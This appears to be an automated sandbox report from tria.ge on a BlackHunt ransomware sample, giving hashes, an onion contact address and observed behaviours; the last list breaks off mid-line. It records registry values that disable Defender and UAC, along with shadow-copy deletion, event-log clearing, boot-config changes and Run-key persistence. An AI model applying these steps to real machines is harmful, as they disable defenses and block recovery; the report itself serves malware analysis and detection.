Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
159s -
max time network
179s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
19/01/2024, 00:21
Static task
static1
Behavioral task
behavioral1
Sample
9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe
Resource
win10v2004-20231215-en
General
-
Target
9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe
-
Size
707KB
-
MD5
fc040cfccc76cfe8c09e98bf106467df
-
SHA1
e9a0448168cb4ce64e215786d47ec0aaa434bd0e
-
SHA256
9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25
-
SHA512
91b4fb26b657122f29a450502d52cf8b1ba69dec2fa46b4c4429f9c49308f8c1915fcfa57ff2e083dbff38860570a6fc4671495e70ec2bd65964d2688413a565
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1I8Yvnh:6uaTmkZJ+naie5OTamgEoKxLWjmh
Malware Config
Extracted
F:\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 644 fsutil.exe 1572 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 3044 wevtutil.exe 396 wevtutil.exe 2588 wevtutil.exe 472 wevtutil.exe 2028 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 2360 bcdedit.exe 2760 bcdedit.exe 2932 bcdedit.exe 1700 bcdedit.exe -
Renames multiple (2900) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 1872 wbadmin.exe 532 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Q: 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened (read-only) \??\O: 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened (read-only) \??\L: 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened (read-only) \??\N: 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\W: 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\R: 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened (read-only) \??\U: 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\S: 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened (read-only) \??\G: 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\P: 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened (read-only) \??\H: 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened (read-only) \??\J: 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened (read-only) \??\V: 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened (read-only) \??\E: 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened (read-only) \??\I: 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened (read-only) \??\M: 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened (read-only) \??\A: 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened (read-only) \??\B: 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened (read-only) \??\T: 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened (read-only) \??\Y: 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened (read-only) \??\K: 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened (read-only) \??\Z: 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened (read-only) \??\X: 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\#BlackHunt_ReadMe.txt 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-compat.xml 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File created C:\Program Files (x86)\Uninstall Information\#BlackHunt_ReadMe.txt 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Merida 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerConstraints.exsd 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Efate 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-progress_ja.jar 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File created C:\Program Files\VideoLAN\VLC\plugins\logger\#BlackHunt_ReadMe.hta 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-print.jar 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Dhaka 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_flat_10_000000_40x100.png 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened for modification C:\Program Files\7-Zip\Lang\gl.txt 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_image-frame-border.png 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\#BlackHunt_ReadMe.hta 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.theme.nl_zh_4.4.0.v20140623020002.jar 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened for modification C:\Program Files\7-Zip\Lang\ga.txt 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\button-highlight.png 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.jdp.ja_5.5.0.165303.jar 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File created C:\Program Files\VideoLAN\VLC\locale\gu\#BlackHunt_ReadMe.hta 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File created C:\Program Files\VideoLAN\VLC\locale\sq\LC_MESSAGES\#BlackHunt_Private.key 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\vlc.mo 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_zh_CN.properties 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\#BlackHunt_ReadMe.txt 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-ui_zh_CN.jar 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Updater.api 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened for modification C:\Program Files\7-Zip\Lang\io.txt 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.services_3.4.0.v20140312-2051.jar 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\cs\LC_MESSAGES\vlc.mo 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File created C:\Program Files\VideoLAN\VLC\plugins\packetizer\#BlackHunt_ReadMe.txt 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\layers.png 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-text_zh_CN.jar 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File created C:\Program Files\Java\jre7\lib\zi\Australia\#BlackHunt_ReadMe.hta 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\dropins\#BlackHunt_Private.key 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File created C:\Program Files\VideoLAN\VLC\locale\an\#BlackHunt_ReadMe.hta 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File created C:\Program Files\VideoLAN\VLC\plugins\video_chroma\#BlackHunt_ReadMe.hta 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.eclipse.nl_ja_4.4.0.v20140623020002.jar 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\MST7MDT 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Chuuk 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.text.nl_zh_4.4.0.v20140623020002.jar 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\jfluid-server-15.jar 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened for modification C:\Program Files\Java\jre7\lib\classlist 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File created C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\#BlackHunt_ReadMe.hta 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_notes-txt-background.png 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Hong_Kong 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\com.jrockit.mc.rcp.product_root_5.5.0.165303 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_TW\#BlackHunt_ReadMe.txt 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-jvmstat.jar 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Currie 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File created C:\Program Files\VideoLAN\VLC\locale\ne\#BlackHunt_ReadMe.hta 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\vlc.mo 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\EST5 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-api_ja.jar 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Jayapura 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\EST5 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File created C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\#BlackHunt_ReadMe.hta 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\#BlackHunt_ReadMe.hta 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\sRGB.pf 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\feedbck2.gif 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.ui_5.5.0.165303.jar 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2456 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1892 vssadmin.exe 2024 vssadmin.exe 1056 vssadmin.exe 1632 vssadmin.exe 2792 vssadmin.exe 1748 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 1668 taskkill.exe -
Modifies registry class 10 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2988 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2508 mshta.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 2664 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe Token: SeRestorePrivilege 2664 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe Token: SeBackupPrivilege 2664 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe Token: SeTakeOwnershipPrivilege 2664 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe Token: SeAuditPrivilege 2664 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe Token: SeSecurityPrivilege 2664 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe Token: SeIncBasePriorityPrivilege 2664 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe Token: SeBackupPrivilege 1720 vssvc.exe Token: SeRestorePrivilege 1720 vssvc.exe Token: SeAuditPrivilege 1720 vssvc.exe Token: SeBackupPrivilege 1704 wbengine.exe Token: SeRestorePrivilege 1704 wbengine.exe Token: SeSecurityPrivilege 1704 wbengine.exe Token: SeSecurityPrivilege 472 wevtutil.exe Token: SeBackupPrivilege 472 wevtutil.exe Token: SeSecurityPrivilege 2028 wevtutil.exe Token: SeBackupPrivilege 2028 wevtutil.exe Token: SeSecurityPrivilege 3044 wevtutil.exe Token: SeBackupPrivilege 3044 wevtutil.exe Token: SeSecurityPrivilege 2588 wevtutil.exe Token: SeBackupPrivilege 2588 wevtutil.exe Token: SeSecurityPrivilege 396 wevtutil.exe Token: SeBackupPrivilege 396 wevtutil.exe Token: SeDebugPrivilege 1668 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2664 wrote to memory of 2800 2664 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe 31 PID 2664 wrote to memory of 2800 2664 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe 31 PID 2664 wrote to memory of 2800 2664 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe 31 PID 2664 wrote to memory of 2800 2664 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe 31 PID 2664 wrote to memory of 2704 2664 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe 33 PID 2664 wrote to memory of 2704 2664 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe 33 PID 2664 wrote to memory of 2704 2664 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe 33 PID 2664 wrote to memory of 2704 2664 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe 33 PID 2664 wrote to memory of 2940 2664 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe 36 PID 2664 wrote to memory of 2940 2664 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe 36 PID 2664 wrote to memory of 2940 2664 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe 36 PID 2664 wrote to memory of 2940 2664 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe 36 PID 2800 wrote to memory of 2844 2800 cmd.exe 35 PID 2800 wrote to memory of 2844 2800 cmd.exe 35 PID 2800 wrote to memory of 2844 2800 cmd.exe 35 PID 2664 wrote to memory of 2580 2664 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe 38 PID 2664 wrote to memory of 2580 2664 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe 38 PID 2664 wrote to memory of 2580 2664 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe 38 PID 2664 wrote to memory of 2580 2664 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe 38 PID 2704 wrote to memory of 2772 2704 cmd.exe 39 PID 2704 wrote to memory of 2772 2704 cmd.exe 39 PID 2704 wrote to memory of 2772 2704 cmd.exe 39 PID 2664 wrote to memory of 2536 2664 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe 40 PID 2664 wrote to memory of 2536 2664 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe 40 PID 2664 wrote to memory of 2536 2664 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe 40 PID 2664 wrote to memory of 2536 2664 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe 40 PID 2664 wrote to memory of 2544 2664 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe 41 PID 2664 wrote to memory of 2544 2664 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe 41 PID 2664 wrote to memory of 2544 2664 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe 41 PID 2664 wrote to memory of 2544 2664 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe 41 PID 2664 wrote to memory of 2608 2664 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe 44 PID 2664 wrote to memory of 2608 2664 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe 44 PID 2664 wrote to memory of 2608 2664 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe 44 PID 2664 wrote to memory of 2608 2664 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe 44 PID 2664 wrote to memory of 3068 2664 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe 46 PID 2664 wrote to memory of 3068 2664 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe 46 PID 2664 wrote to memory of 3068 2664 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe 46 PID 2664 wrote to memory of 3068 2664 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe 46 PID 2940 wrote to memory of 2584 2940 cmd.exe 47 PID 2940 wrote to memory of 2584 2940 cmd.exe 47 PID 2940 wrote to memory of 2584 2940 cmd.exe 47 PID 2664 wrote to memory of 2400 2664 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe 48 PID 2664 wrote to memory of 2400 2664 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe 48 PID 2664 wrote to memory of 2400 2664 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe 48 PID 2664 wrote to memory of 2400 2664 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe 48 PID 2664 wrote to memory of 572 2664 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe 50 PID 2664 wrote to memory of 572 2664 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe 50 PID 2664 wrote to memory of 572 2664 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe 50 PID 2664 wrote to memory of 572 2664 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe 50 PID 2664 wrote to memory of 2512 2664 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe 52 PID 2664 wrote to memory of 2512 2664 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe 52 PID 2664 wrote to memory of 2512 2664 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe 52 PID 2664 wrote to memory of 2512 2664 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe 52 PID 2664 wrote to memory of 2452 2664 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe 54 PID 2664 wrote to memory of 2452 2664 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe 54 PID 2664 wrote to memory of 2452 2664 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe 54 PID 2664 wrote to memory of 2452 2664 9fe40244670cbb8e726a185dcc382c141f2ab26fbfc34083323680b7e3f66c25.exe 54 PID 2544 wrote to memory of 1772 2544 cmd.exe 55 PID 2544 wrote to memory of 1772 2544 cmd.exe 55 PID 